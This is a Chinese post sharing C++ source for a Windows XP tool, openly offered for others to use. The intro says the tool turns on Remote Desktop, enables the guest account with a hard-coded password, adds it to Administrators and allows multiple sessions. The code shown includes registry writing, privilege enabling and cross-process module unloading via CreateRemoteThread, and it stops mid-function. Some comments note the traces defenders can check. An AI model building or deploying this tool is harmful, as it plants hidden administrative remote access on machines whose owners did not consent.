
xp下双开3389源码

很早以前写的，放出来方便大家使用，以后代码丢了我也能在百度上搜到。编译后直接运行，会自动开启 XP 的终端服务、激活 guest 账户（密码为 cooldiyer）并将其加入管理员组，同时允许多用户登录。对防守方来说，guest 被启用并进入管理员组、终端服务被打开且允许多会话，都是本机上可以直接核查的痕迹。

 
   // xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer
//
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include <windows.h>
#include <tlhelp32.h>
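/// Look up a running process by its executable name.
///
/// @param szProcName  Name compared case-insensitively against the szExeFile
///                    field of each PROCESSENTRY32 in the snapshot.
/// @return The th32ProcessID of the first matching entry, or 0 when nothing
///         matches or the process snapshot cannot be taken.
DWORD
GetProcessId(LPCTSTR szProcName)
{
    // CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE,
    // not NULL, so a plain truth test would treat a failed call as a success.
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);   // must be set before Process32First

    DWORD dwPid = 0;          // stays 0 when no entry matches
    for (BOOL bMore = Process32First(hSnapshot, &pe);
         bMore;
         bMore = Process32Next(hSnapshot, &pe))
    {
        if (lstrcmpi(szProcName, pe.szExeFile) == 0)
        {
            dwPid = pe.th32ProcessID;
            break;
        }
    }

    CloseHandle(hSnapshot);
    return dwPid;
}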

// Window-enumeration callback (the call site is not part of this listing).
// For every visible window whose owning process ID equals the value passed
// in lParam, a WM_CLOSE message is sent. Always returns true, so the
// enumeration is never cut short.
bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
    const DWORD dwTargetPid = (DWORD)lParam;
    DWORD dwOwnerPid = 0;

    if (IsWindowVisible(hwnd))
    {
        // The second argument of GetWindowThreadProcessId receives the
        // owning *process* ID; the thread ID is the (ignored) return value.
        GetWindowThreadProcessId(hwnd, &dwOwnerPid);
        if (dwOwnerPid == dwTargetPid)
        {
            // ask the matching process's window to close
            SendMessage(hwnd, WM_CLOSE, 0, 0);
        }
    }
    return true;
}
// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114
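/// Create, set or delete a registry key or value under MainKey\SubKey.
///
/// @param MainKey  Parent key handle. It belongs to the caller and is left
///                 open; only the handle opened here is closed.
/// @param SubKey   Path of the key to work on, relative to MainKey.
/// @param Vname    Value name for Mode 0/1/3, child key name for Mode 2.
/// @param Type     REG_SZ, REG_EXPAND_SZ or REG_DWORD for Mode 0/1. Any other
///                 type (REG_BINARY included) is not written.
/// @param szData   NUL-terminated string used for the string types.
///                 NOTE(review): a char* next to LPCTSTR names assumes an
///                 ANSI (non-UNICODE) build; confirm against the project settings.
/// @param dwData   Value used for REG_DWORD.
/// @param Mode     0 = create SubKey if missing, then set the value;
///                 1 = set the value in an existing SubKey;
///                 2 = delete the child key Vname;
///                 3 = delete the value Vname.
/// @return 1 on success, 0 on any failure or unsupported Mode/Type.
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
    HKEY  hKey = NULL;            // initialised so it is never closed while holding garbage
    DWORD dwDisposition = 0;
    LONG  lOpen;
    int   iResult = 0;

    // Step 1: obtain exactly one handle to SubKey. Mode 0 previously fell
    // through into the Mode 1 open and leaked the handle it had just created.
    switch (Mode)
    {
    case 0:
        // Same rights as the other modes request; setting a value needs no more.
        lOpen = RegCreateKeyEx(MainKey, SubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
                               KEY_READ | KEY_WRITE, NULL, &hKey, &dwDisposition);
        break;
    case 1:
    case 2:
    case 3:
        lOpen = RegOpenKeyEx(MainKey, SubKey, 0, KEY_READ | KEY_WRITE, &hKey);
        break;
    default:
        return 0;
    }
    if (lOpen != ERROR_SUCCESS)
        return 0;

    // Step 2: perform the requested operation on the opened key.
    switch (Mode)
    {
    case 0:
    case 1:
        switch (Type)
        {
        case REG_SZ:
        case REG_EXPAND_SZ:
            // A NULL string would crash strlen; treat it as a failed write.
            if (szData != NULL &&
                RegSetValueEx(hKey, Vname, 0, Type, (LPBYTE)szData,
                              (DWORD)strlen(szData) + 1) == ERROR_SUCCESS)
                iResult = 1;
            break;
        case REG_DWORD:
            if (RegSetValueEx(hKey, Vname, 0, Type, (LPBYTE)&dwData,
                              sizeof(DWORD)) == ERROR_SUCCESS)
                iResult = 1;
            break;
        default:
            // REG_BINARY and other types are not implemented.
            break;
        }
        break;
    case 2:
        if (RegDeleteKey(hKey, Vname) == ERROR_SUCCESS)
            iResult = 1;
        break;
    case 3:
        if (RegDeleteValue(hKey, Vname) == ERROR_SUCCESS)
            iResult = 1;
        break;
    }

    // Only the handle opened above is released; MainKey is the caller's.
    RegCloseKey(hKey);
    return iResult;
}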
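/// Enable or disable one named privilege in the current process token.
///
/// @param PName    Privilege name handed to LookupPrivilegeValue.
/// @param bEnable  TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute.
/// @return true only when the token was opened, the name resolved to a LUID
///         and the adjustment was applied in full; false otherwise.
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
        return false;

    TOKEN_PRIVILEGES TokenPrivileges;
    TokenPrivileges.PrivilegeCount = 1;
    TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

    bool bResult = false;
    // An unknown privilege name leaves the LUID unset, so stop there instead
    // of passing an uninitialised LUID to AdjustTokenPrivileges.
    if (LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid) &&
        AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        // AdjustTokenPrivileges can return TRUE without granting anything
        // (ERROR_NOT_ALL_ASSIGNED), so the last-error value decides.
        bResult = (GetLastError() == ERROR_SUCCESS);
    }

    CloseHandle(hToken);
    return bResult;
}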
// Unloads a module from another process by starting a thread in that
// process whose entry point is FreeLibrary and whose argument is the module
// handle.
//
// dwProcessID    target process ID
// hModuleHandle  module handle as seen inside the target; NULL is rejected
//
// Returns true once the remote thread has been created and has finished.
// The thread's exit code is never read, so true does not show that
// FreeLibrary itself succeeded.
//
// Detection note: a thread created in a foreign process is visible to
// endpoint telemetry (for example Sysmon event ID 8, CreateRemoteThread),
// and the OpenProcess call asks for VM-write, VM-operation and
// create-thread rights on the target.
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
HANDLE hRemoteThread;
HANDLE hProcess;

if (hModuleHandle == NULL)
  return false;
hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
if (hProcess == NULL)
  return false;

// The FreeLibrary address is resolved in THIS process and reused in the target.
// NOTE(review): assumes kernel32.dll is mapped at the same address in both; confirm.
// NOTE(review): the GetProcAddress result is not checked before use.
HMODULE hModule=::GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, "FreeLibrary");
hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);

if(hRemoteThread==NULL)
{
  ::CloseHandle(hProcess);
  return false;
}
// Blocks with no timeout until the remote thread exits.
::WaitForSingleObject(hRemoteThread,INFINITE);
::CloseHandle(hProcess);
::CloseHandle(hRemoteThread);
return true;
}
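/// Search the module list of one process for a module with the given path.
///
/// @param dwProcessID   Process whose modules are enumerated.
/// @param lpModulePath  Full path compared case-insensitively against the
///                      szExePath field of each MODULEENTRY32.
/// @return The hModule of the first match, or NULL when the module is not
///         loaded there or the module snapshot cannot be taken.
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
    // Failure is reported as INVALID_HANDLE_VALUE; bail out rather than
    // enumerating and closing an invalid handle.
    HANDLE hModuleSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
    if (hModuleSnap == INVALID_HANDLE_VALUE)
        return NULL;

    MODULEENTRY32 me32 = {0};
    me32.dwSize = sizeof(MODULEENTRY32);   // required before Module32First

    HANDLE hModuleHandle = NULL;
    for (BOOL bMore = ::Module32First(hModuleSnap, &me32);
         bMore;
         bMore = ::Module32Next(hModuleSnap, &me32))
    {
        if (lstrcmpi(me32.szExePath, lpModulePath) == 0)
        {
            hModuleHandle = me32.hModule;
            break;
        }
    }

    ::CloseHandle(hModuleSnap);
    return hModuleHandle;
}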
// Walks every process in a system snapshot and, wherever FindModule reports
// the module at lpModulePath as loaded, calls UnloadRemoteModule on it.
//
// lpModulePath  full module path, matched by FindModule
//
// Returns the result of the LAST UnloadRemoteModule call made (bRet is
// overwritten on each hit), or false when the module was found nowhere.
//
// Detection note: this touches every process that has the module loaded, so
// one run yields a burst of cross-process handle opens and remote thread
// creations from a single source process.
bool UnloadModule(LPCTSTR lpModulePath)
{
BOOL bRet = false;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);

// NOTE(review): the snapshot handle is not compared with INVALID_HANDLE_VALUE.
HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

// look through the running processes
if(::Process32First(hProcessSnap, &pe32))
{
  do
  {
   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
   if (hModuleHandle != NULL)
   {
    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
   }
  }while (Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
return bRet;
}
void StartService(LPCTSTR lpService)
{
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
if ( NULL != hSCManager )
{
  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
  if ( NULL != hService )
  {
   StartService(hService, 0, NULL);
   CloseServiceHandle( hService );
  }
  CloseServiceHandle( hS
